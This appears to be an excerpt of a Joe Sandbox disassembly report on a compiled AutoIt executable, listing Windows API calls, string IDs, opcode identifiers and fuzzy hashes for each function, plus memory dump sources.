                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%n
                                                    • API String ID: 529118366-38505642
                                                    • Opcode ID: 5251bfd97691c1fd634e1c853a78bb535a2d70dd612bbd2669b017dcec207d69
                                                    • Instruction ID: 1c54c66eab212c2e9c525f8f901dc6695697700d22de98654dbebaef41105c00
                                                    • Opcode Fuzzy Hash: 5251bfd97691c1fd634e1c853a78bb535a2d70dd612bbd2669b017dcec207d69
                                                    • Instruction Fuzzy Hash: 5D5107B1D04108EECF05EBB8EC159ED777BBF85741F008169F851B22E1DA78564ACB29

                                                    Control-flow Graph

                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 006549CD
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • GetCurrentProcess.KERNEL32(?,006DFAEC,00000000,00000000,?), ref: 00654A9A
                                                    • IsWow64Process.KERNEL32(00000000), ref: 00654AA1
                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00654AE7
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00654AF2
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00654B23
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00654B2F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                    • String ID:
                                                    • API String ID: 1986165174-0
                                                    • Opcode ID: 6be04704ecf5f40ab166dbff4d08af5da2a8e53fc45438de2bdfff11510b44f2
                                                    • Instruction ID: c63488a068075acd27426e6a1f30e43d48bf06ffdad0c4a068a655039765fc58
                                                    • Opcode Fuzzy Hash: 6be04704ecf5f40ab166dbff4d08af5da2a8e53fc45438de2bdfff11510b44f2
                                                    • Instruction Fuzzy Hash: 6891053198A7C0DEC731DB6894501EABFF6AF29305F084AAED4C783B41D621A54CC76D

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00654D8E,?,?,00000000,00000000), ref: 00654E99
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00654D8E,?,?,00000000,00000000), ref: 00654EB0
                                                    • LoadResource.KERNEL32(?,00000000,?,?,00654D8E,?,?,00000000,00000000,?,?,?,?,?,?,00654E2F), ref: 0068D937
                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00654D8E,?,?,00000000,00000000,?,?,?,?,?,?,00654E2F), ref: 0068D94C
                                                    • LockResource.KERNEL32(00654D8E,?,?,00654D8E,?,?,00000000,00000000,?,?,?,?,?,?,00654E2F,00000000), ref: 0068D95F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: fe998011a95195aff538fe1d49f4742d611e8f16d2ed4843ff54f53d7deae75c
                                                    • Instruction ID: a384429b38f4ae8e537f101f661476eede8ce4cb5a84f6d4f0b1826a5c8b4449
                                                    • Opcode Fuzzy Hash: fe998011a95195aff538fe1d49f4742d611e8f16d2ed4843ff54f53d7deae75c
                                                    • Instruction Fuzzy Hash: D0119A70600300BFD7218BA5EC49F677BBBFBC5B12F2482ADF80686250DB61E8448A60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Ddq$Ddq$Variable must be of type 'Object'.$+
                                                    • API String ID: 0-143587551
                                                    • Opcode ID: f5e0c83e474cb994701755d3f6f48b878e2d59e9e1e7ac0b06e0d2d59e1e7566
                                                    • Instruction ID: a8091fe9e6a2efc8b3dafcbb96e3a13539bc349749cbba872b37e3acf37fbcd0
                                                    • Opcode Fuzzy Hash: f5e0c83e474cb994701755d3f6f48b878e2d59e9e1e7ac0b06e0d2d59e1e7566
                                                    • Instruction Fuzzy Hash: 62A26A75A00215CBCF28CF58C480AAAB7B7FF59311F248169EC159B351D736EE8ACB94
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,0068E398), ref: 006B446A
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 006B447B
                                                    • FindClose.KERNEL32(00000000), ref: 006B448B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 277565d88dfd0814a71abe8eaf93aa1e906f2770a06722244192ecf353f5d732
                                                    • Instruction ID: 778b04db3f8a4475c8d8069b2712e4059b56eb1f27b440b1b0689d5e30d4814f
                                                    • Opcode Fuzzy Hash: 277565d88dfd0814a71abe8eaf93aa1e906f2770a06722244192ecf353f5d732
                                                    • Instruction Fuzzy Hash: B4E0DF728119006B8310AB78EC0D8EA779EDE05335F200726F836C21E1EBB49E9096D6
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00660A5B
                                                    • timeGetTime.WINMM ref: 00660D16
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00660E53
                                                    • Sleep.KERNEL32(0000000A), ref: 00660E61
                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00660EFA
                                                    • DestroyWindow.USER32 ref: 00660F06
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00660F20
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00694E83
                                                    • TranslateMessage.USER32(?), ref: 00695C60
                                                    • DispatchMessageW.USER32(?), ref: 00695C6E
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00695C82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbq$pbq$pbq$pbq
                                                    • API String ID: 4212290369-3732479470
                                                    • Opcode ID: 8ecb5cb783ca89f882e3ff45dbae347ff09ec5c0317ce4ec4176cec58bf99c36
                                                    • Instruction ID: 1d72c8bb6e80d511bbebbdcb6e14137692fe76ba78049843ec00aaf9971011f7
                                                    • Opcode Fuzzy Hash: 8ecb5cb783ca89f882e3ff45dbae347ff09ec5c0317ce4ec4176cec58bf99c36
                                                    • Instruction Fuzzy Hash: 3FB2F370608741DFDB25DF24C884BAAB7E6BF84304F14892DF84A973A1CB75E845CB86

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 006B8F5F: __time64.LIBCMT ref: 006B8F69
                                                      • Part of subcall function 00654EE5: _fseek.LIBCMT ref: 00654EFD
                                                    • __wsplitpath.LIBCMT ref: 006B9234
                                                      • Part of subcall function 006740FB: __wsplitpath_helper.LIBCMT ref: 0067413B
                                                    • _wcscpy.LIBCMT ref: 006B9247
                                                    • _wcscat.LIBCMT ref: 006B925A
                                                    • __wsplitpath.LIBCMT ref: 006B927F
                                                    • _wcscat.LIBCMT ref: 006B9295
                                                    • _wcscat.LIBCMT ref: 006B92A8
                                                      • Part of subcall function 006B8FA5: _memmove.LIBCMT ref: 006B8FDE
                                                      • Part of subcall function 006B8FA5: _memmove.LIBCMT ref: 006B8FED
                                                    • _wcscmp.LIBCMT ref: 006B91EF
                                                      • Part of subcall function 006B9734: _wcscmp.LIBCMT ref: 006B9824
                                                      • Part of subcall function 006B9734: _wcscmp.LIBCMT ref: 006B9837
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006B9452
                                                    • _wcsncpy.LIBCMT ref: 006B94C5
                                                    • DeleteFileW.KERNEL32(?,?), ref: 006B94FB
                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006B9511
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006B9522
                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006B9534
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 1500180987-0
                                                    • Opcode ID: 388fb0402990cf2e2024438c528174f2dca8b0e1d00e983a94bea1b7c649cadc
                                                    • Instruction ID: fdcfd82ac062b9382b5bc524a6b16095d5f657cd30aa6d96d959b9414992ef60
                                                    • Opcode Fuzzy Hash: 388fb0402990cf2e2024438c528174f2dca8b0e1d00e983a94bea1b7c649cadc
                                                    • Instruction Fuzzy Hash: 9BC11EB1D00219ABDF61DFA5CC85ADEB7BEEF45310F0040AAF609E7151DB309A858F65

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00654706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007152F8,?,006537AE,?), ref: 00654724
                                                      • Part of subcall function 0067050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00657165), ref: 0067052D
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006571A8
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0068E8C8
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0068E909
                                                    • RegCloseKey.ADVAPI32(?), ref: 0068E947
                                                    • _wcscat.LIBCMT ref: 0068E9A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$xV
                                                    • API String ID: 2673923337-3671864596
                                                    • Opcode ID: cf018354d5c14a80a66f805d74abad8cf428fdcb649a9e40d6c96dc79e6f8282
                                                    • Instruction ID: cf3d5010faef7692e54ba61fc3903142e629b2d97e9ca355a24e0646fa073f00
                                                    • Opcode Fuzzy Hash: cf018354d5c14a80a66f805d74abad8cf428fdcb649a9e40d6c96dc79e6f8282
                                                    • Instruction Fuzzy Hash: B471A0715093019EC750EF29EC519ABBBEAFF88350F40852EF845872A0EB759948CB5A

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00653074
                                                    • RegisterClassExW.USER32(00000030), ref: 0065309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006530AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 006530CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006530DC
                                                    • LoadIconW.USER32(000000A9), ref: 006530F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00653101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 806bf60b209d6a7177a9ddd2ecf56247f6c0a5bbbd074ecaea885aa633ad2ec2
                                                    • Instruction ID: 8f2401f3d4325b2437c808e361262b2b05b4fd68c67b76385d3e727d8a402b34
                                                    • Opcode Fuzzy Hash: 806bf60b209d6a7177a9ddd2ecf56247f6c0a5bbbd074ecaea885aa633ad2ec2
                                                    • Instruction Fuzzy Hash: 8D3118B1D41349EFDB10CFA8EC88ADDBBF1FB09310F14812AE581A62A0D3B90645CF55

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00653074
                                                    • RegisterClassExW.USER32(00000030), ref: 0065309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006530AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 006530CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006530DC
                                                    • LoadIconW.USER32(000000A9), ref: 006530F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00653101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: c2267421b1c30a950ac9b7b802edcdc0458d6a0faf5b0f3f5e426292d401a308
                                                    • Instruction ID: 2abf4240cd9e39dfd47b20539f0ec8eab49fa8df3063b8f58182bb5a845dbc53
                                                    • Opcode Fuzzy Hash: c2267421b1c30a950ac9b7b802edcdc0458d6a0faf5b0f3f5e426292d401a308
                                                    • Instruction Fuzzy Hash: D721C4B1D11218EFDB00DFA8EC89BDDBBF5FB08700F04912AF911AA2A0D7B546448F95

                                                    Control-flow Graph

                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 006536D2
                                                    • KillTimer.USER32(?,00000001), ref: 006536FC
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0065371F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0065372A
                                                    • CreatePopupMenu.USER32 ref: 0065373E
                                                    • PostQuitMessage.USER32(00000000), ref: 0065374D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated$%n
                                                    • API String ID: 129472671-3795218793
                                                    • Opcode ID: fe0556bd3766f26b5ff8819a42797901981db4e511c79cdf3e6aee0e039d3144
                                                    • Instruction ID: 694b9140d0aa953dd334442b5c5ae6e31568cff1b4b08a161abf037290c905c1
                                                    • Opcode Fuzzy Hash: fe0556bd3766f26b5ff8819a42797901981db4e511c79cdf3e6aee0e039d3144
                                                    • Instruction Fuzzy Hash: 0D4159B2600515FBCB186F28EC19BF93797EB44782F14412DFD02863E1CA759E4A9329

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00653A50
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00653A5F
                                                    • LoadIconW.USER32(00000063), ref: 00653A76
                                                    • LoadIconW.USER32(000000A4), ref: 00653A88
                                                    • LoadIconW.USER32(000000A2), ref: 00653A9A
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00653AC0
                                                    • RegisterClassExW.USER32(?), ref: 00653B16
                                                      • Part of subcall function 00653041: GetSysColorBrush.USER32(0000000F), ref: 00653074
                                                      • Part of subcall function 00653041: RegisterClassExW.USER32(00000030), ref: 0065309E
                                                      • Part of subcall function 00653041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006530AF
                                                      • Part of subcall function 00653041: InitCommonControlsEx.COMCTL32(?), ref: 006530CC
                                                      • Part of subcall function 00653041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006530DC
                                                      • Part of subcall function 00653041: LoadIconW.USER32(000000A9), ref: 006530F2
                                                      • Part of subcall function 00653041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00653101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: 2250bf511e4de6db381ff249c170a5604641131a07e4794348509f4ea566ce1f
                                                    • Instruction ID: d53f2edf338af27de84c91941e460910e1e0a8aee782eded132b434a20cb79ea
                                                    • Opcode Fuzzy Hash: 2250bf511e4de6db381ff249c170a5604641131a07e4794348509f4ea566ce1f
                                                    • Instruction Fuzzy Hash: 652129B2D11304EBEB14DFA8EC09BDD7BB1FB48711F00811AE500A62E1D3B956448B98

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rq
                                                    • API String ID: 1825951767-3000925734
                                                    • Opcode ID: 4030b22e97089230c814587367a1a428cb83e4c3e48e0415363aecad0a0837d9
                                                    • Instruction ID: 70e60471ceaeff6fb88bfb6eb08a80b93bad262efa4d68bb6399343da98666eb
                                                    • Opcode Fuzzy Hash: 4030b22e97089230c814587367a1a428cb83e4c3e48e0415363aecad0a0837d9
                                                    • Instruction Fuzzy Hash: 90A191B2D0022D9ACB44EBA4DC56AEEB77ABF54301F40052EF806B7291DF745A0CCB64

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00670193
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0067019B
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006701A6
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006701B1
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006701B9
                                                      • Part of subcall function 00670162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006701C1
                                                      • Part of subcall function 006660F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0065F930), ref: 00666154
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0065F9CD
                                                    • OleInitialize.OLE32(00000000), ref: 0065FA4A
                                                    • CloseHandle.KERNEL32(00000000), ref: 006945C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: <Wq$\Tq$p*$%n$Sq
                                                    • API String ID: 1986988660-1466840592
                                                    • Opcode ID: 4c773068e1e3511b29d9c9467482100f07777361632eec16021aa1f565ccf87d
                                                    • Instruction ID: ee7a91cc1e190e03a2150def53513d40b28018d36aa769942d48c693d14a3905
                                                    • Opcode Fuzzy Hash: 4c773068e1e3511b29d9c9467482100f07777361632eec16021aa1f565ccf87d
                                                    • Instruction Fuzzy Hash: E781ACB0911A80CE938CDF7DE8456D87BE6EBD8306750C12E9819CB2E1EB7845848F1D

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 032D2681
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 032D28A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateFileFreeVirtual
                                                    • String ID:
                                                    • API String ID: 204039940-0
                                                    • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                    • Instruction ID: 58e14c17b826a116b61379ef79944b88487fa42d82416677a3d3bc091084b775
